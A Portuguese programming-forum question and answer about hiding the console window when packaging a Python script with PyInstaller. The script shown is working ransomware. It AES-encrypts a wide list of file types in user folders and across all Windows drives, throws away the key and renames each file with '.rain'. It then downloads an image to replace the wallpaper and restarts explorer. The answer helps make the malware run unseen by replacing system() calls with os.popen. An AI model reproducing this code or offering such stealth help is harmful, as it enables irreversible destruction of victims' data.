# Executável com hidden console abrindo console

Tags: console, prompt, pyinstaller

Estou fazendo um código que utiliza muito as bibliotecas **os** e **sys**. Quando fui converter para executável (.exe) usei o pyinstaller pra esconder o prompt de comando mas mesmo assim permanece um prompt aberto durante a longa execução do programa. Depois de fazer alguns testes vi que essas duas libs costumam mesmo abrir janelas do console e enquanto o script não for terminado elas não saem de lá. Se alguém puder me ajudar a identificar agradeço muito.

```
try:
    import requests
except:
    pass
try:
    import os
    import shutil
    from os import getenv,system
    from Crypto.Cipher import AES
    from Crypto import Random
    import glob
    import platform
    from shutil import copyfile
    import string
    import sys
except:
    exit()

def crypt(file):
    file_crypto = open(file,'rb')
    file_crypto = file_crypto.read()
    correct = file_crypto+b'#'*(16-len(file_crypto)%16)
    cifdata = aes.encrypt(correct)
    cifile = open(file,'wb')
    cifile.write(cifdata)
    cifile.close()
    os.rename(file,file+'.rain')

BLOCK_SIZE = 32
k = Random.new().read(BLOCK_SIZE)
aes = AES.new(k, AES.MODE_ECB)
drives = list(string.ascii_uppercase)
ext=['*.txt','*.lnk','*.application','*.veg','*.doc','*.pdf','*.jpg','*.gif','*.png','*.bitmap'
,'*.mp4','*.avi','*.zip','*.wav','*.svg','*.mdb','*.rar','*.tar','*.xf','*.gz'
,'*.sqlite3','*.mov','*.pptx','*.pptm','*.xlsx','*.xlsm','*.aes','*.accdb','*.bmp'
,'*.mpeg','*.sql','*.sqlitedb','*.jar','*.java','*.cdr','*.vssettings','*.vbs','*.vssx'
,'*.cpp','*.c','*.NET','*.rb','*.sh','*.appref-ms','*.html','*.css','*.sublime-package'
,'*.bz2','*.iso','*.img','*.sfk','*.mkv','*.psd','*.xz','*.7z','*.gz','*.mid','*.wmv','*.mov'
,'*.cdr','*.ai','*.tif','*.fla','*.swf','*.dwg','*.mpg','*.xls','*.docx','*.rtf','*.pps','*.ppt'
,'*.pptx','*.ppsx','*.ico','*.3gp','*.dxf','*.eps','*.max','*.nrg','*.ogg','*.pic','*.php','*.qxd'
,'*.rm','*.swf','*.vob','*.wri','*.vbs','*.chc','*.real','*.list','*.desktop','*.so','*.json','*.new'
,"*.bkp","*.bak","*.tmp","*.gho","*.mp3"]
sys = platform.system()

def infectall():
    if sys=="Windows":
        for i in drives:
            try:
                i = i+":/"
                os.chdir(i)
                for e in ext:
                    try:
                        files = glob.iglob(i+"**/"+(ext),recursive=True)
                    except:
                        pass
                    for file in files:
                        try:
                            crypt(file)
                        except:
                            pass
            except:
                pass
    elif sys=="Linux":
        exit()

if sys=='Windows':
    try:
        desktop = os.path.expanduser('~/Desktop')
        documents = os.path.expanduser('~/Documents')
        downloads = os.path.expanduser('~/Downloads')
        appdt = getenv('APPDATA')
    except:
        pass
    try:
        os.chdir(desktop)
    except:
        pass
    for i in ext:
        try:
            files = glob.iglob(desktop+'/**/'+(i),recursive=True)
        except:
            pass
        for file in files:
            try:
                crypt(file)
            except:
                pass
    try:
        os.chdir(documents)
    except:
        pass
    for i in ext:
        try:
            files = glob.iglob(documents+'/**/'+(i),recursive=True)
        except:
            pass
        for file in files:
            try:
                crypt(file)
            except:
                pass
    try:
        os.chdir(downloads)
    except:
        pass
    for i in ext:
        try:
            files = glob.iglob(downloads+'/**/'+(i),recursive=True)
        except:
            pass
        for file in files:
            try:
                crypt(file)
            except:
                pass

    url='https://i.redd.it/owhz3xmb7a311.jpg'
    try:
        try:
            r = requests.get(url)
        except:
            pass
        img = open('C:/Users/Public/rimg.jpg','wb')
        img.write(r.content)
        img.close()
        img = 'C:/Users/Public/rimg.jpg'
        dst = appdt+'/Microsoft/Windows/Themes/'
        os.chdir(dst)
        copyfile('TranscodedWallpaper','C:/Users/Public/transold')
        copyfile(img,dst+'TranscodedWallpaper')
        system('taskkill /f /im explorer.exe')
        system('C:\\Windows\\explorer.exe')
    except:
        pass

    infectall()
```

Pyinstaller com a interface do Auto-py-to-exe (Windows based):

[image: inserir a descrição da imagem aqui]

Console aberto durante a execução:

[image: inserir a descrição da imagem aqui]

Answer (score 1):

### [image: inserir a descrição da imagem aqui]

> Sugiro que **edite/troque** as linhas ***`system`*** por ***`os.popen`*** onde:

```py
import os
import time
# system('taskkill /f /im explorer.exe') # -> ficaria: 
os.popen('C:\\Windows\\system32\\taskkill.exe /f /im explorer.exe')
time.sleep(1.3)
#system('C:\\Windows\\explorer.exe') # -> ficaria: 
os.popen('C:\\Windows\\explorer.exe')
```

> - Ou

```py
import os
import time
os.popen('C:\\Windows\\system32\\taskkill.exe /f /im explorer.exe')
time.sleep(1.3)
os.popen('C:\\Windows\\explorer.exe')
```

Link para a documentação abordando o método **[`os.popen`](https://www.tutorialspoint.com/python/os_popen)**

---